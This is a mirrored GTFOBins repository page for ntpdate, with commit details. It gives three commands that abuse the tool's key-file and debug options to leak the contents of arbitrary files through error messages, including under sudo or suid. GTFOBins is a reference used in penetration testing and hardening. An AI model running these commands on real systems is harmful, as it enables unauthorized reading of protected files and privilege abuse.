1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/ntpdate.md
Bagas Mukti e988dbb8fa
Add ntpdate
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-12-23 13:22:22 +01:00

396 B

description functions
The file is actually parsed and lines are leaked through error messages.
file-read sudo suid
code
LFILE=file_to_read ntpdate -a x -k $LFILE -d localhost
code
LFILE=file_to_read sudo ntpdate -a x -k $LFILE -d localhost
code
LFILE=file_to_read ./ntpdate -a x -k $LFILE -d localhost